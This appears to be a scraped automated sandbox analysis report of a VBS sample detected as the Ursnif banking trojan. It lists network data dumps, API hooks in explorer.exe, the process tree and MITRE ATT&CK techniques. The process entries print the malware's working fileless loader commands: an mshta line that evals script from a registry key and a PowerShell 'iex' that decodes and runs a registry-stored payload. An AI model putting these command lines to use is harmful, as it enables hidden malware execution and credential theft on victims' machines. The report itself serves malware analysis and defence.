Nov 23, 2020 16:13:02.882842064 CET	5708	IN	Data Raw: 17 f8 49 6e 44 04 41 48 e9 97 31 aa 6d 21 96 5b c8 52 04 e0 67 90 ca 06 b1 74 f2 b9 83 fd 6f 84 30 a9 5d a1 d2 77 cc 39 1f 92 b0 9c f5 2f ad 51 2c b4 84 0a a4 68 e9 c5 40 88 a0 40 e4 e2 58 a5 2e bf 45 fa 71 85 82 b5 e1 25 b2 6c ce 4a 7b a5 fd 8f Data Ascii: InDAH1m![Rgto0]w9/Q,h@@X.Eq%lJ{jVP@MMTo,+Q{xi-Q_Rdj16:Yn4KDg,r#1tO18K}-@4?WSn#4&<8@hk-
Nov 23, 2020 16:13:02.882877111 CET	5710	IN	Data Raw: c7 83 50 cb 38 bb 55 2d 31 b3 1b 99 92 58 6e 49 04 d5 14 28 55 59 85 4c fd b2 73 b7 50 07 41 6c 06 91 13 0d 30 73 b8 46 0e 5f 2c 99 d2 7e 4d 5c ef 20 72 86 ef b0 ba 33 7b 08 0e 7b 09 cc 99 35 d4 f8 e2 60 cc 69 32 da 3f 97 e2 75 42 14 cd 1a c0 9a Data Ascii: P8U-1XnI(UYLsPAl0sF_,~M\ r3{{5`i2?uB77fH%TEs8lm$??gv"o>:qioy@U;F2Ja%2l:='o.{Bhm5vHB8OM3UxJyRH@'TD)
Nov 23, 2020 16:13:03.159611940 CET	5711	IN	Data Raw: 90 c4 c7 20 64 67 72 f0 3b b2 52 a5 b4 6b 78 54 5d e6 95 52 61 63 22 7a ba 21 c4 4a 6f bc e0 9a db 4a 5e 58 c6 af 90 c0 d3 73 b9 72 ad ad 7e fd 1f 6f 6a b2 55 41 b3 3b e9 c3 c6 c0 76 ef 83 2e a2 c3 90 85 82 fe 0a 12 4f 60 81 ed f0 d5 1d 0e 8f 2d Data Ascii: dgr;RkxT]Rac"z!JoJ^Xsr~ojUA;v.O`-8GMN;%N}-.<Q1P0Vo[W5.7_)q[bzA{WmPS+xf!!jc/j6^$M?j)

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFB70FF521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFB70FF5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFB70FF520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	6105020

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	6105020

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 4156 Parent PID: 3388

General

Start time:	16:11:19
Start date:	23/11/2020
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\JeSoTz0An7tn.vbs'
Imagebase:	0x7ff74f9d0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6388 Parent PID: 792

General

Start time:	16:11:45
Start date:	23/11/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff613620000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6444 Parent PID: 6388

General

Start time:	16:11:45
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
Imagebase:	0xa80000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6600 Parent PID: 6388

General

Start time:	16:11:51
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:82952 /prefetch:2
Imagebase:	0xa80000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6968 Parent PID: 6388

General

Start time:	16:11:56
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:82958 /prefetch:2
Imagebase:	0xa80000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 6608 Parent PID: 3388

General

Start time:	16:12:03
Start date:	23/11/2020
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff630370000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 5500 Parent PID: 6608

General

Start time:	16:12:05
Start date:	23/11/2020
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff785e30000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3924 Parent PID: 5500

General

Start time:	16:12:06
Start date:	23/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 6628 Parent PID: 5500

General

Start time:	16:12:15
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline'
Imagebase:	0x7ff71ec60000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 1536 Parent PID: 6628

General

Start time:	16:12:16
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES508E.tmp' 'c:\Users\user\AppData\Local\Temp\p4xjawzl\CSCF25F578263E4AA98A5ACFCF8CC63832.TMP'
Imagebase:	0x7ff6741d0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 484 Parent PID: 5500

General

Start time:	16:12:19
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.cmdline'
Imagebase:	0x7ff71ec60000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 5168 Parent PID: 484

General

Start time:	16:12:20
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5FA2.tmp' 'c:\Users\user\AppData\Local\Temp\c2racwwn\CSC8F1415F2367845AF84D1583CADF7143D.TMP'
Imagebase:	0x7ff680590000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: control.exe PID: 1492 Parent PID: 1968

General

Start time:	16:12:24
Start date:	23/11/2020
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff6741d0000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 4832 Parent PID: 1492

General

Start time:	16:12:27
Start date:	23/11/2020
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff772c30000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 5500

General

Start time:	16:12:29
Start date:	23/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 3668 Parent PID: 3388

General

Start time:	16:12:47
Start date:	23/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6883e0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.656715294.000001FC1383E000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: mshta.exe PID: 6608 Parent PID: 3388 mshta.exeCOMMON

Executed Functions

Function 00000268C48F0FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000003.311678729.00000268C48F0000.00000010.00000001.sdmp, Offset: 00000268C48F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_3_268c48f0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 869b8625591794a86ed289e2f5e2a0a9a6658daec66507dbfe3d3c1ec846f757
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 3E9002244D640A59E41811910C4966C5050E389150FD48581481690184D84E02D611A2

Uniqueness

Uniqueness Score: -1.00%

Function 00000268C48F0FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000003.311678729.00000268C48F0000.00000010.00000001.sdmp, Offset: 00000268C48F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_3_268c48f0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 869b8625591794a86ed289e2f5e2a0a9a6658daec66507dbfe3d3c1ec846f757
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 3E9002244D640A59E41811910C4966C5050E389150FD48581481690184D84E02D611A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report JeSoTz0An7tn.vbs

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Hook Summary

Processes

Statistics

CPU Usage

Memory Usage

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre